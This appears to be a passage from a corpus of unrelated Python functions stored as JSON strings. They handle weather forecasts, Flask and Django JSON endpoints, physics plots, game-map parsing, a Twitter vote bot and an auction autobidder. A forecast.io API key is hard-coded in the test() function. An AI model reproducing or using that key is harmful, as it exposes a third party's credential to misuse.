os.path.join(temp_json_target_root, str(uuid4()))\n fitbit_access.save_heart_data(temp_json_target, start_date, days_limit)\n resting_hr, activity = process_heart_json_files(temp_json_target)\n\n return {\n \"resting_heart_rate\": resting_hr,\n \"heart_activity\": activity\n }", "def process_weather(forecast_file):\n with open(forecast_file) as json_file:\n json_data = json.load(json_file)\n\n min_temp_store = {}\n max_temp_store = {}\n weather_results = str()\n header_results = str()\n\n for day_in_forecast in json_data['DailyForecasts']:\n day_date = day_in_forecast['Date']\n min_temp = day_in_forecast['Temperature']['Minimum'][\"Value\"]\n min_temp_c = convert_f_to_c(min_temp)\n min_temp_store[day_date] = min_temp_c\n max_temp = day_in_forecast['Temperature']['Maximum'][\"Value\"]\n max_temp_c = convert_f_to_c(max_temp)\n max_temp_store[day_date] = max_temp_c\n\n day_time_phrase = day_in_forecast['Day']['LongPhrase']\n rain_chance_day = day_in_forecast['Day']['RainProbability']\n night_time_phrase = day_in_forecast['Night']['LongPhrase']\n rain_chance_night = day_in_forecast['Night']['RainProbability']\n weather_results = weather_results + (f\"-------- {convert_date(day_date)} --------\\nMinimum Temperature: {format_temperature(round(min_temp_c,1))}\\nMaximum Temperature: {format_temperature(round(max_temp_c,1))}\\nDaytime: {day_time_phrase}\\n Chance of rain: {rain_chance_day}%\\nNighttime: {night_time_phrase}\\n Chance of rain: {rain_chance_night}%\\n\")+ \"\\n\"\n\n\n max_day = max(max_temp_store, key=max_temp_store.get)\n max_value = max_temp_store[max_day]\n min_day = min(min_temp_store, key=min_temp_store.get)\n min_value = min_temp_store[min_day]\n max_totals = (sum(max_temp_store.values()))\n min_totals = (sum(min_temp_store.values()))\n num_items = len(min_temp_store)\n mean_min = round(calculate_mean(min_totals,num_items),1)\n mean_max = round(calculate_mean(max_totals,num_items),1)\n\n save_header = (f\"{len(json_data['DailyForecasts'])} Day Overview\\n The lowest temperature will be {format_temperature(round((min_value),1))}, and will occur on {convert_date(min_day)}.\\n The highest temperature will be {format_temperature(round((max_value),1))}, and will occur on {convert_date(max_day)}.\\n The average low this week is {format_temperature(mean_min)}.\\n The average high this week is {format_temperature(mean_max)}.\\n\")\n\n header_results = save_header + \"\\n\"+ weather_results\n \n return(header_results)", "def WriteReachedData(filename, page_to_reached_data):\n json_object = []\n for (offset, data) in page_to_reached_data.items():\n json_object.append({'offset': offset, 'total': data['total'],\n 'reached': data['reached']})\n with open(filename, 'w') as f:\n json.dump(json_object, f)", "def tobs():\n # calculate year ago from latest date in database\n latest_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n year_ago = dt.datetime.strptime(latest_date[0], \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n # retrieve temp observations and convert to list\n temps = list(session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= year_ago).all())\n return jsonify(temps)", "def test():\n #Our API key\n api_key = \"5c5a1a440d3b0e89239368a9a8fb251b\"\n #latitude - The latitude of the location for the forecast\n lat = 13.7522222\n #longitude - The longitude of the location for the forecast\n lng = 100.4938889\n #datetime.datetime(year, month, day[, hour[, minute[, second[, microsecond[, tzinfo]]]]])\n year = 2015\n month = 11\n day = 8\n 
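# example date/time parts: the query below defaults to the current time and\n # the fixed-datetime lookup is commented out (only day is reused later, for\n # the hard-coded November 2015 queries)\n 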
hour = 1\n minute = 22\n second = 33\n current_time = datetime.datetime.now()\n time = current_time\n #specific date\n #time = datetime.datetime(year, month, day, hour, minute, second, 44, pytz.UTC)\n forecast = forecastio.load_forecast(api_key, lat, lng, time=time)\n day = time.day\n the_dict = dict()\n the_list = list()\n #number of the day needs\n for i in range(2):\n forecast2 = forecastio.load_forecast(api_key, lat, lng, time=time)\n by_hour2 = forecast2.hourly()\n print(\"DAY:\",day,time.strftime(\"%B\"), file=myfile)\n for hourly_data_point in by_hour2.data:\n the_weather = \"\"+str(hourly_data_point)[30:].split(' at')[0].strip()\n the_list.append(the_weather)\n d = dict()\n for c in the_list:\n if c not in d:\n d[c] = 1\n else:\n d[c] = d[c] + 1\n sorted_d = sorted(d.items(), key=operator.itemgetter(0))\n sorted_d.reverse()\n print (sorted_d, file=myfile)\n #myfile.write(sorted_d)\n forecast2 = forecastio.load_forecast(api_key, lat, lng, time=datetime.datetime(2015, 11, day, 1, 22, 33, 44, pytz.UTC))\n print(forecast2.hourly().summary, file=myfile)\n #myfile.write(forecast2.hourly().summary)\n time += datetime.timedelta(days=1)\n day = time.day\n the_list = list()\n myfile.close()\n #Reset day for next method\n day = time.day\n print(\"===========Currently Data=========\")\n print(forecast.currently())\n #print(\"===========Hourly Data=========\")\n by_hour = forecast.hourly()\n #print(\"Hourly Summary: %s\" % (by_hour.summary))\n #print(\"bhs\",by_hour.summary)\n for hourly_data_point in by_hour.data:\n break\n #print(hourly_data_point)\n #print(str(hourly_data_point)[30:].split(' at')[0])\n #print(\"===========Daily Data=========\")\n by_day = forecast.daily()\n #API no longer support this point\n #print(\"Daily Summary: %s\" % (by_day.summary))\n for daily_data_point in by_day.data:\n break\n print(daily_data_point)", "def do_tradehist24(self,args):\n try:\n print \"Starting to download entire trade history from bitstamp....\",\n eth = bitstamp.get_transactions(86400)\n with open(os.path.join(partialpath + 'bitstamp_entiretrades.txt'),'w') as f:\n depthvintage = str(time.time())\n f.write(depthvintage)\n f.write('\\n')\n json.dump(eth,f)\n f.close()\n print \"Finished.\"\n except Exception as e:\n print \"Unexpected Error: %s\" % e\n self.onecmd('help tradehist24')", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n km = request.args.get('km', 999, type=float)\n distance = request.args.get('distance', type = int)\n begin_date = request.args.get('begin_date', type = str)\n begin_time = request.args.get('begin_time', type = str)\n dateAndTime = begin_date + \" \" + begin_time\n time = arrow.get(dateAndTime, 'YYYY-MM-DD HH:mm') \n \n open_time = acp_times.open_time(km, distance, time.isoformat())\n close_time = acp_times.close_time(km, distance, time.isoformat())\n result = {\"open\": open_time, \"close\": close_time}\n return flask.jsonify(result=result)", "def update_autobidder_logs(self):\n # also update user config vars\n self.getUserConfig()\n\n try:\n num_coins = self.driver.find_element(\n By.XPATH, '/html/body/main/section/section/div[1]/div[1]/div[1]').text\n num_coins = str(num_coins)\n if \",\" in num_coins:\n num_coins = num_coins.replace(\",\", \"\")\n\n num_coins = int(num_coins)\n self.user_num_coins = num_coins\n with open('./data/gui_stats.json', 'r') as f:\n json_data = json.load(f)\n # json_data2 = json_data[0]\n json_data[0][\"# of Targets\"] = self.user_num_target_players\n json_data[0]['# of Bids to make on each'] = 
self.user_num_bids_each_target\n json_data[0]['Requests made'] = self.user_requests_made\n json_data[0]['Bids made'] = self.user_bids_made\n json_data[0]['Transfer list size'] = self.user_transferlist_size\n json_data[0]['Active bids'] = self.user_activebids\n json_data[0]['Current coins'] = self.user_num_coins\n json_data[0]['Players won'] = self.user_players_won\n json_data[0]['Projected Profit'] = self.user_projected_profit\n json_data[0]['Actual profit'] = \"--\"\n\n json_data[0]['watchlist_winning'] = self.user_watchlist_winning\n json_data[0]['watchlist_outbid'] = self.user_watchlist_outbid\n json_data[0]['watchlist_totalsize'] = self.user_watchlist_totalsize\n json_data[0]['transferlist_selling'] = self.user_transferlist_selling\n json_data[0]['transferlist_sold'] = self.user_transferlist_sold\n json_data[0]['transferlist_totalsize'] = self.user_transferlist_totalsize\n json_data[0]['Starting coins'] = self.user_start_coins\n\n with open('./data/gui_stats.json', 'w') as f:\n f.write(json.dumps(json_data))\n except:\n print(\"Err update_autobidder_logs\")", "def getMaxTipPercentage(trip_year, trip_quarter):\n paramlist = []\n status = 0\n try:\n # Dynamically add parameter for SP call\n if trip_year is not None:\n paramlist.append(validateNumericInput(trip_year))\n if trip_quarter is not None:\n paramlist.append(validateNumericInput(trip_quarter))\n procname = 'sp_YelloTaxiTipInsight'\n # Return column list\n columnlist = ['trip_year', 'trip_quarter', 'max_tip_pctg']\n # Read data from DB as per requested criteria\n dftippercentage, success = readusingsqldbproc(procname, paramlist, columnlist)\n ret_json_str = ''\n if len(dftippercentage.head(1)) > 0 and len(paramlist) > 0:\n # Rounding off to next digit\n dftippercentage['max_tip_pctg'] = \\\n dftippercentage['max_tip_pctg'].round().astype('int')\n # Rename as per response contract\n dftippercentage = dftippercentage.rename(\n columns={'max_tip_pctg': 'maxTipPercentage', 'trip_quarter': 'quarter'})\n # Convert the Response Dataframe to JSON String\n if dftippercentage.shape[0] == 1:\n dftippercentage = dftippercentage.drop(['trip_year', 'quarter'], axis=1)\n ret_json_str = dftippercentage.to_json(orient='records')[1:-1]\n else:\n j = dftippercentage.groupby(['trip_year'], as_index=False) \\\n .apply(lambda x: x[['quarter', 'maxTipPercentage']].to_dict('r')) \\\n .reset_index().drop('index', axis=1) \\\n .rename(columns={0: 'maxTipPercentages'}) \\\n .to_json(orient='records')\n ret_json_str = json.dumps(json.loads(j), indent=2, sort_keys=False)[1:-1]\n else:\n raise ValueError(\"No data found for this criteria or minimal parameter is missing\")\n except Exception as exp:\n expStr = repr(exp)\n res_dict = \"{'error':\"+ expStr+\"}\"\n ret_json_str = json.loads(json.dumps(res_dict,indent=2, sort_keys=False))\n status = 1\n\n return ret_json_str,status", "def calculate():\n print 'AJAX getJSON request to get current data and begin compute on new client'\n global isBegin, CurrentIndex, isFinished, ComputationTime, N, Row, RowIndex\n if isBegin:\n generate_random_texts(N)\n ComputationTime = time.time()\n RowIndex = (RowN - 1) * 256\n Row = FirstText[RowIndex:RowIndex + 255]\n part = SecondText[CurrentIndex:CurrentIndex+1024]\n isBegin = False\n else:\n Row = FirstText[RowIndex:RowIndex + 255]\n part = SecondText[CurrentIndex:CurrentIndex+1024]\n if isFinished:\n Row = ''\n part = ''\n return jsonify(current_row=Row, current_part=part)", "def footprint_demo(**kw):\n # Note: needs fixed slits in single_point()\n count = 1500000\n data = 
[]\n for theta in np.linspace(0.15, 5, 30):\n n = single_point(theta=theta, count=count, trace=False, **kw)\n data.append((theta, np.sum(n.active)))\n print(data[-1])\n x, y = zip(*data)\n pylab.plot(x, np.array(y)/count)\n pylab.show()
def output_job_overhead(self):\r\n results_dirname = get_param(\"results_dir\")\r\n filename = os.path.join(results_dirname,\r\n \"%s_%s\" % (get_param(\"file_prefix\"),\r\n \"overhead\"))\r\n overhead_file = open(filename, \"w\")\r\n overhead_file.write(\"ResponseTime\\tLongestTask\\n\")\r\n for job in self.completed_jobs:\r\n overhead_file.write(\"%d\\t%d\\n\" %\r\n (job.response_time(), job.longest_task))\r\n overhead_file.close()
def overheads(NPT, DIT, NDIT):\n ov = 360. + 120. + NPT*NDIT*(DIT + 80. + 15.)\n print('Telescope time in h = ', ov/3600.)
def trip_duration_stats(df):\n start_time = time.time()\n ##task3 Trip duration: total and average travel time\n ## time of each trip is given in seconds, it is converted into minutes and hours\n ##Task3.1 & 3.2 the total and average trip time, rounded to 2 decimal places are displayed in a table\n ##The shortest trip in the database is displayed in seconds\n ##The longest trip is displayed in seconds and in days\n total_travel_time=df['Trip Duration'].sum()\n average_travel_time=df['Trip Duration'].mean()\n travel_time={\"total\":pd.Series([total_travel_time,total_travel_time/60,total_travel_time/3600], index = ['Seconds', 'Minutes', 'Hours']),\n \"Average\":pd.Series([average_travel_time,average_travel_time/60,average_travel_time/3600], index = ['Seconds', 'Minutes', 'Hours'])}\n travel_time_data = pd.DataFrame(travel_time)\n shortest_time=df['Trip Duration'].min()\n longest_time=df['Trip Duration'].max()\n \n print(\"The shortest trip was\",shortest_time,\" seconds\")\n print(\"the longest trip was\",longest_time.round(2),\"seconds, almost in days\",(longest_time/(60*60*24)).round(2))\n print(\"=\"* 25)\n print('\\nThe total travel time in seconds, minutes and hours is given by: \\n', travel_time_data[\"total\"].to_frame())\n print(\"=\"* 25)\n print(\"\\nThe average travel time in seconds, minutes and hours is given by:\\n\",travel_time_data[\"Average\"].round(2).to_frame())\n print(\"=\"* 25)\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)
def get_map_notes(map_json, **kwargs):\n length = kwargs.get(\"length\", -1)\n divisor = kwargs.get(\"divisor\", 4)\n tick_times = get_map_timing_array(map_json, length=length, divisor=divisor)\n\n objs = map_json[\"obj\"]\n obj_times = list(map(lambda obj: obj[\"time\"], objs))\n\n # 1 for circle, 2 for slider, 3 for spinner\n def get_note_type(obj):\n if not obj:\n return 0\n if obj[\"type\"] & 2:\n return 2\n elif obj[\"type\"] & 8:\n return 3\n return 1\n\n po = 0\n note_max_wait_time = kwargs.get(\"note_max_wait_time\", 1000)\n start_time = obj_times[0] - note_max_wait_time\n last_obj_time = start_time\n sliding = 0\n slider_end_time = 0\n spinning = 0\n spinner_end_time = 0\n data = []\n flow_data = []\n\n # constant multipliers and subtractions\n tlen_mp = 1/500\n tlen_s = 1\n bpm_mp = 1/120\n bpm_s = 1\n slen_mp = 1/150\n slen_s = 1\n\n # tick count from start of uninherited timing section\n uts_i = 0\n\n # tick is timestamp here\n for i, tick in enumerate(tick_times):\n\n if is_uts_begin(map_json, tick):\n uts_i = 0\n else:\n uts_i += 1\n\n # Attach extra vars at the end of each note data row\n tlen = get_tick_len(map_json, tick)\n bpm = 60000 / tlen\n slen = get_slider_len(map_json, tick)\n ex1 = tlen * 
tlen_mp - tlen_s\n ex2 = bpm * bpm_mp - bpm_s\n ex3 = slen * slen_mp - slen_s\n\n while obj_times[po] < tick - 5 and po < len(obj_times) - 1:\n po += 1\n if obj_times[po] >= tick - 5 and obj_times[po] <= tick + 5: # found note\n last_obj_time = tick\n note_type = get_note_type(objs[po])\n\n # calculate momentum\n if po >= 1:\n momentum = get_momentum(objs[po], objs[po-1], slen/tlen)\n else:\n momentum = 0\n\n # flow data\n if po >= 1:\n input_vector = get_input_vector(objs[po], objs[po-1])\n output_vector = get_output_vector(objs[po], objs[po-1])\n else:\n input_vector = [0, 0]\n output_vector = [0, 0]\n if input_vector is None or input_vector[0] is None or input_vector[1] is None:\n input_vector = [0, 0]\n if output_vector is None or output_vector[0] is None or output_vector[1] is None:\n output_vector = [0, 0]\n\n # end point\n endpoint = get_end_point(objs[po])\n flow_data.append([uts_i, tick, note_type, objs[po][\"x\"], objs[po][\"y\"], input_vector[0],\n input_vector[1], output_vector[0], output_vector[1], endpoint[0], endpoint[1]])\n\n # put data\n if note_type == 1:\n spinning = 0\n sliding = 0\n elif note_type == 2:\n sliding = 1\n slider_end_time = objs[po][\"sliderData\"][\"endTime\"]\n elif note_type == 3:\n spinning = 1\n spinner_end_time = objs[po][\"spinnerEndTime\"]\n # because the spinner sometimes get over 3 secs\n last_obj_time = spinner_end_time\n\n # TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3\n data.append([uts_i, tick, 1, note_type, sliding,\n spinning, momentum, ex1, ex2, ex3])\n elif spinning == 1:\n if tick >= spinner_end_time - 5:\n spinning = 0\n data.append([uts_i, tick, 1, 5, 0, 0, 0, ex1, ex2, ex3])\n else:\n data.append([uts_i, tick, 0, 0, 0, 1, 0, ex1, ex2, ex3])\n elif sliding == 1:\n if tick >= slider_end_time - 5:\n sliding = 0\n data.append([uts_i, tick, 1, 4, 0, 0, 0, ex1, ex2, ex3])\n else:\n data.append([uts_i, tick, 0, 0, 1, 0, 0, ex1, ex2, ex3])\n else: # not found\n if tick - last_obj_time < note_max_wait_time and tick >= start_time:\n data.append([uts_i, tick, 0, 0, 0, 0, 0, ex1, ex2, ex3])\n return data, flow_data", "def chart1(request):\n\n full_url = HttpRequest.build_absolute_uri(request)\n relative = HttpRequest.get_full_path(request)\n\n base_url = full_url[:-len(relative)]\n\n request_amount = ['10', '100', '200', '500', '1000']\n\n json_urls = list()\n xml_urls = list()\n\n for x in request_amount:\n json_urls.append(reverse('objects:leads_json', args=[x]))\n xml_urls.append(reverse('objects:leads_xml', args=[x]))\n\n json_data = list()\n xml_data = list()\n\n for x in json_urls:\n json_average=0\n for i in range (0,5):\n start = time.perf_counter()\n req = requests.get(base_url + x)\n end = time.perf_counter()\n json_average += (end-start)\n json_data.append((json_average)/5)\n\n for x in xml_urls:\n xml_average=0\n for i in range(0,5):\n start = time.perf_counter()\n req = requests.get(base_url + x)\n end = time.perf_counter()\n xml_average+=(end-start)\n xml_data.append((xml_average)/5)\n\n final_data = {\n 'labels': request_amount,\n 'datasets': [\n {\n 'label': 'JSON',\n 'backgroundColor': 'rgba(255, 99, 132, 0.2)',\n 'borderColor': 'rgba(255,99,132,1)',\n 'data': json_data,\n 'borderWidth': 2,\n 'yAxisID': 'first-y-axis'\n },\n {\n 'label': 'XML',\n 'backgroundColor': 'rgba(54, 162, 235, 0.2)',\n 'borderColor': 'rgba(54, 162, 235, 1)',\n 'data': xml_data,\n 'borderWidth': 2,\n 'yAxisID': 'first-y-axis'\n }\n ]\n }\n\n return JsonResponse(final_data)", "def MakeWpTPostFitPlots(jsonNames, postfix=\"\"):\n 
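# Reads one combine-style impacts JSON per W-pT bin and fills ROOT histograms\n # with the fitted signal strength and per-nuisance impact magnitudes\n # (jsonNames is assumed to be ordered to match the hard-coded wptbins edges).\n 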
import numpy as np\n # hard code the w pt binning for now\n wptbins = np.array([0., 8.0, 16.0, 24.0, 32.0, 40.0, 50.0, 70.0, 100.0, 120.0])\n nbins = wptbins.shape[0] - 1\n\n hmu = ROOT.TH1F(\"hmu_wpt_{}\".format(postfix), \"hmu_wpt_{}\".format(postfix), nbins, wptbins)\n\n sysUncs = ['lumi_13TeV', 'Recoil', 'QCD', 'Prefire', 'norm_tt', 'effstat', 'norm_taunu', 'FSR', 'tagpt', 'norm_z']\n colors = {\"total\": 1, 'lumi_13TeV': 14, \"Recoil\": 2, \"QCD\": 3, \"Prefire\": 4, \"effstat\":6, \"norm_taunu\": 7, \"tagpt\": 8, \"norm_z\": 9, \"norm_tt\": 28, \"FSR\": 38}\n\n himpacts = OrderedDict()\n himpacts['total'] = ROOT.TH1F(\"htotal_wpt_{}\".format(postfix), \"htotal_wpt_{}\".format(postfix), nbins, wptbins)\n for unc in sysUncs: \n himpacts[unc] = ROOT.TH1F(\"h{}_wpt_{}\".format(unc, postfix), \"h{}_wpt_{}\".format(unc, postfix), nbins, wptbins)\n\n for ibin, jname in enumerate(jsonNames, start=1):\n with open(jname) as f:\n results = json.load(f)\n \n # assuming the 0th POI is the signal strength\n poiname = results['POIs'][0]['name']\n diff = results['POIs'][0]['fit'][1] - results['POIs'][0]['fit'][0]\n hmu.SetBinContent(ibin, results['POIs'][0]['fit'][1])\n hmu.SetBinError(ibin, diff)\n himpacts['total'].SetBinContent(ibin, abs(diff))\n\n # loop over the systematics, find the ones in the sysUncs list\n for systematic in results['params']:\n if systematic[\"name\"] in sysUncs:\n diff = systematic[\"impact_\"+poiname]\n himpacts[systematic[\"name\"]].SetBinContent(ibin, abs(diff))\n\n for key, val in himpacts.iteritems():\n val.SetLineColor(colors[key])\n\n hmu.SetLineColor(1)\n DrawHistos([hmu], ['W^{+}#rightarrow#mu^{+}#nu'], 0, 120, \"W p_{T} [GeV]\", 0.5, 1.5, \"#sigma_{Obs}/#sigma_{MC}\", \"hsignal_strength_\"+postfix, dology=False, legendPos=[0.92, 0.88, 0.70, 0.80])\n\n DrawHistos(himpacts.values(), himpacts.keys(), 0, 120, \"W p_{T} [GeV]\", 0, 0.20, \"Uncertainty\", \"himpacts_wpt_\"+postfix, dology=False, legendPos=[0.92, 0.88, 0.70, 0.40], drawashist=True)", "def convert(self, data, *args, **kwargs):\n\n # all of this is still quite ugly and verrrry specific...\n json_data = {}\n for hit in data[\"hits\"][\"hits\"]:\n # pprint(hit)\n\n # get the PQ\n pq = hit.get(\"_source\", {}).get(\"metadata\", {}).get(\"PanDAQueue\", None)\n if not pq:\n continue\n\n # get the list of all benchmark results\n latest_list = (\n hit.get(\"inner_hits\", {})\n .get(\"most_recent\", {})\n .get(\"hits\", {})\n .get(\"hits\", [])\n )\n if len(latest_list) == 0:\n continue\n\n # get the average of the latest benchmark results.\n # Only results not older than 7d, and a maximum of 50 results (whichever value is hit first).\n # If we have no values more recent than 7d, simply use the last available one (that PQ is probably not online anymore anyway)\n values = []\n for d in latest_list:\n date = datetime.datetime.strptime(\n d.get(\"_source\", {}).get(\"timestamp\", \"\"), \"%Y-%m-%dT%H:%M:%SZ\"\n )\n two_days_ago = datetime.datetime.now() - datetime.timedelta(days=2)\n seven_days_ago = datetime.datetime.now() - datetime.timedelta(days=7)\n\n if date > two_days_ago:\n # we are within the last two days, so we take all the measurements we can get!\n values.append(d)\n elif (date < two_days_ago) and (date > seven_days_ago):\n # we are between 2 and 7 days ago, so take only values if we don't have 25 values already\n if len(values) < 30:\n values.append(d)\n elif date < seven_days_ago:\n # we are further away than 7 days, so take a maximum of 5 values from here if we don't have 5 yet\n if len(values) < 
10:\n values.append(d)\n\n to_average = [\n i.get(\"_source\", {})\n .get(\"profiles\", {})\n .get(\"fastBmk\", {})\n .get(\"value\", 0.0)\n for i in values\n ]\n json_data[pq] = {\n \"avg_value\": float(sum(to_average)) / len(to_average),\n \"measurements\": len(to_average),\n }\n # print(len(to_average))\n\n return json_data", "def run(self):\n new_tweets = pd.DataFrame(\n columns=[\"tweet_id\", \"congress\", \"session\", \"date\", \"vote\"],\n dtype=str,\n )\n for item in self.senate_data[\"vote_summary\"][\"votes\"][\"vote\"]:\n query = (\n \"congress == @self.congress \"\n \"and session == @self.session \"\n \"and date == @item['vote_date'] \"\n \"and vote == @item['vote_number']\"\n )\n\n # If the current vote isn't already processed, then process it\n if self.tweets.query(query).empty:\n try:\n text, party_data, vote_data = self.senate_obj.process_vote(\n item\n )\n status = self.twitter_api.update_status(text)\n # Keep track of new tweets to be reconciled with old\n # tweets later\n new_tweets = new_tweets.append(\n {\n \"tweet_id\": status.id_str,\n \"congress\": self.congress,\n \"session\": self.session,\n \"date\": item[\"vote_date\"],\n \"vote\": item[\"vote_number\"],\n **party_data,\n **vote_data,\n },\n ignore_index=True,\n )\n except Exception as e:\n # Tweet failed for some reason\n logging.error(\"Tweet failed\")\n logging.error(item)\n logging.error(e)\n\n # Only process a limited number of tweets in a single run\n if len(new_tweets) == self.MAX_TWEETS:\n break\n\n if not new_tweets.empty:\n logging.info(f\"Tweeted {len(new_tweets)} new votes\")\n self.__save(self.tweets.append(new_tweets))\n # Function needs to return something to work as a Cloud Function\n return new_tweets[\"tweet_id\"].to_json()\n else:\n return \"{}\" # Empty JSON object", "def get_updated_stats(request):\n\t# read current values in chart\n\tlog_file = open('./load_charts/static/load_charts/uptime_log', 'r')\n\tuptime_values = ast.literal_eval(log_file.read())\n\tlog_file.close()\n\t#defines current oldest entry\n\toldest_record = datetime.datetime.strptime(uptime_values[-1][\"date\"], '%Y-%m-%d %H:%M:%S')\n\t#defines a two minutes interval from now\n\ttime_interval = datetime.datetime.utcnow() - timedelta(minutes=2)\n\n\t# creates a dict with stats from uptime statistics (uptime, users ...)\n\tdata = parse_uptime()\n\t# default alert is -1 nothing is triggered\n\tdata[\"alert\"] = -1\n\n\t# we need at least a two minutes history\n\tif time_interval > oldest_record:\n\t\tthreshold = float(request.GET.get('threshold', ''))\n\t\tsum_avg = 0\n\t\tnb = 0\n\t\t# compute avg load on past two minutes\n\t\tfor pos, val in enumerate(uptime_values):\n\t\t\tval_date = datetime.datetime.strptime(val[\"date\"], '%Y-%m-%d %H:%M:%S')\n\t\t\tif val_date > time_interval:\n\t\t\t\tsum_avg += val[\"value\"]\n\t\t\t\tnb += 1\n\t\t# Case avg > threshold set alert to 1 else set alert to 0\n\t\tif nb:\n\t\t\tavg = sum_avg / nb\n\t\t\tdata[\"value\"] = avg\n\t\t\tif avg > threshold:\n\t\t\t\tdata[\"alert\"] = 1\n\t\t\telif avg < threshold:\n\t\t\t\tdata[\"alert\"] = 0\n\n\treturn HttpResponse(json.dumps(data))", "def tobs():\n # query for the last day\n\n # Create our session (link) from Python to the DB\n session = Session(engine)\n \n last_day = session.query(Measurement.date).order_by(Measurement.date.desc()).first()[0]\n len_months = 12\n # convert result to datetime format\n last_day = datetime.datetime.strptime(last_day, \"%Y-%m-%d\")\n # calculate start day\n start_day = last_day - datetime.timedelta(days=365)\n 
start_day = \"{:%Y-%m-%d}\".format(start_day)\n\n # Design a query to retrieve the last 12 months of temperature data and plot the results\n results = session.query(Measurement.date, Measurement.tobs, Measurement.station).\\\n filter(Measurement.date >= start_day ).\\\n order_by(Measurement.date).all()\n\n session.close()\n \n temps = []\n for result in results:\n temp_dict = {}\n temp_dict[\"date\"] = result.date\n temp_dict[\"tobs\"] = result.tobs\n temp_dict[\"station\"] = result.station\n temps.append(temp_dict)\n \n return jsonify(temps)", "def test_json_maths(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 123, \"lagavulin\": [4, 2]}})\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 456, \"lagavulin\": [5, 0]}})\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 758, \"lagavulin\": [7, 10]}})\n tracker.write(event=\"armagnac\", metadata={\"age\": \"XO\"})\n tracker.write(event=\"armagnac\", metadata={\"age\": 15})\n\n assert len(tracker.read()) == 5\n assert len(tracker.read(metadata__uigeadail__contains=\"lagavulin\")) == 3\n assert len(tracker.read(metadata__uigeadail__value__gt=123)) == 2\n assert len(tracker.read(metadata__uigeadail__value__gte=123)) == 3\n\n whiskies = tracker.sum(\"metadata__uigeadail__value\")\n assert len(whiskies) == 1\n assert whiskies.iloc[0][\"sum\"] == 1337\n\n assert len(tracker.read(metadata__contains=\"age\")) == 2\n assert len(tracker.read(metadata__age=\"XO\")) == 1", "def watch_worker():\n global isFinished, ComputationTime, UsersOnline, N, CurrentIndex, Count\n received_data = request.json\n Count += received_data\n if CurrentIndex >= N:\n print 'Second text got ', Count, ' entries of given row.'\n print '--- %s seconds ---' % (time.time() - ComputationTime)\n isFinished = True\n return jsonify(current_row='', current_part='')\n else:\n print 'Current row in second text: ', CurrentIndex / 256\n part = SecondText[CurrentIndex:CurrentIndex+1023]\n CurrentIndex += 1024\n return jsonify(current_row=Row, current_part=part)", "def lightening_reply_tally(user_name, msg_logs, scorecard_map):\n if not msg_logs:\n return\n\n prev_msg_ts = 0\n is_prev_msg_outgoing = is_my_outgoing_msg(ujson.loads(msg_logs[0][0]))\n\n for row in msg_logs:\n msg = ujson.loads(row[0])\n msg_ts = msg['CreateTime']\n time_delta = msg_ts - prev_msg_ts\n\n if is_my_outgoing_msg(msg):\n if not is_prev_msg_outgoing and time_delta <= ONE_MIN:\n # I replied quickly, bump my p value\n scorecard_map[user_name].my_pval += (60 - time_delta) / 120\n else:\n if is_prev_msg_outgoing and time_delta <= ONE_MIN:\n # Someone replied quickly, bump their p value\n scorecard_map[user_name].their_pval += (60 - time_delta) / 120\n\n prev_msg_ts = msg_ts\n is_prev_msg_outgoing = is_my_outgoing_msg(msg)", "def update_live_data(n, last_time, id1, id2, power):\n if power:\n raise PreventUpdate\n\n timer_start = perf_counter()\n # 1 sec delay so server has time to add live data\n end_time = datetime.now(timezone.utc) - timedelta(seconds=1)\n\n # Initialization and lag prevention\n if last_time is None or end_time - strptime_fix(last_time) > timedelta(seconds=3):\n logging.warning('Falling behind! 
Start %s End %s', last_time, end_time)\n return dash.no_update, dash.no_update, end_time.isoformat(), dash.no_update\n\n # Query data from SMIP\n logging.info(f'start_time {last_time} end_time {end_time}')\n timer_query_start = perf_counter()\n r = conn.get_data(last_time, end_time.isoformat(),\n [id1, id2], timeout=1)\n timer_query_end = perf_counter()\n response_json: dict = r.json()\n logging.debug(response_json.keys())\n if 'errors' in response_json:\n logging.error(response_json)\n raise Exception()\n data = response_json['data']['getRawHistoryDataWithSampling']\n logging.info('Got %s responses in %s seconds', len(\n data), timer_query_end - timer_query_start)\n\n # Used for measuring performance\n start_processing = perf_counter()\n\n # Unpack data\n def unpack(id: int):\n \"\"\"Unpacks return data into time and value lists\"\"\"\n id = int(id)\n time_list = [i['ts'] for i in data if int(i['id']) == id]\n val_list = [i['floatvalue'] for i in data if int(i['id']) == id]\n # SMIP always returns one entry before the start time for each ID, we don't need this\n if len(time_list) < 2 or len(val_list) < 2:\n return dash.no_update\n time_list.pop(0)\n val_list.pop(0)\n # Measure sampling rate\n rate = nan\n if len(time_list) > 1:\n rate = (strptime_fix(time_list[1])\n - strptime_fix(time_list[0])).total_seconds()\n return {'time_list': time_list, 'val_list': val_list, 'rate': rate}\n\n # Used for measuring performance\n data_processed = perf_counter()\n logging.info('Total %s Query %s Processing %s', data_processed - timer_start, timer_query_end - timer_query_start,\n data_processed - start_processing)\n\n return unpack(id1), unpack(id2), end_time.isoformat(), \\\n [f'Last updated {end_time.astimezone()},',\n html.Br(),\n f'received {len(data)} samples in {round(data_processed - timer_start, 3)} seconds']", "def refresh_counterfactual_json(request):\t\n\n\n \"\"\"\n the following json are for compound exposures\n \"\"\"\n #json_file = '/home/zhou/Downloads/jsons/compound/json_9.json'\n\tjson_file = '/Users/jiaozi/Downloads/jsons/compound/json_9.json'\n\n exposure_sequence = read_json(json_file)#list of exposures{mean,sd,non_rate}\n\n\tprimeCoordinator = PrimeCoordinator()\n\tprimeCoordinator.get_counterfactual_compound_exposures(exposure_sequence)\n\t\n\t# get the data in the interface\n\tb_output_mortality \t= primeCoordinator.output_baseline_mortality # baseline mortality list for all outcomes\n\tb_output_mortality_num \t= primeCoordinator.output_baseline_mortality_num # baseline mortality sum up for each outcome\n\tb_total_mortality \t= primeCoordinator.output_baseline_mortality_total# baseline mortality sum up for all outcomes\n\tc_output_mortality \t= primeCoordinator.output_counterfactual_mortality# counterfactual mortality for all outcomes\n\tc_output_mortality_num \t= primeCoordinator.output_counterfactual_mortality_num# counterfactual 